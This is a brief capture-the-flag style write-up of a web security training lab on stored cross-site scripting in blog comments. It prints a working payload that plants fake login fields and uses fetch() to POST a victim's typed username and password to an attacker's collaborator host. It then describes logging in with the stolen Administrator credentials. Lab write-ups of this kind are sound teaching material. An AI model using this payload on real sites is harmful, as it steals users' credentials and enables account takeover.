LAB 23 - Exploiting cross-site scripting to capture passwords¶

Initial instructions¶

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password then use these credentials to log in to the victim's account.¶

To solve this lab I used the following payload.

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

We need to inject this payload into the Body while posting a comment.

alt text

Now lets go to the collaborator and we will see a HTTP request. Here we have in plain text the Administrator password.

alt text

Lets login to solve the lab.

alt text

LAB 23 - Exploiting cross-site scripting to capture passwords¶

Initial instructions¶

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password then use these credentials to log in to the victim's account.¶

Congratulations, you solved the lab!¶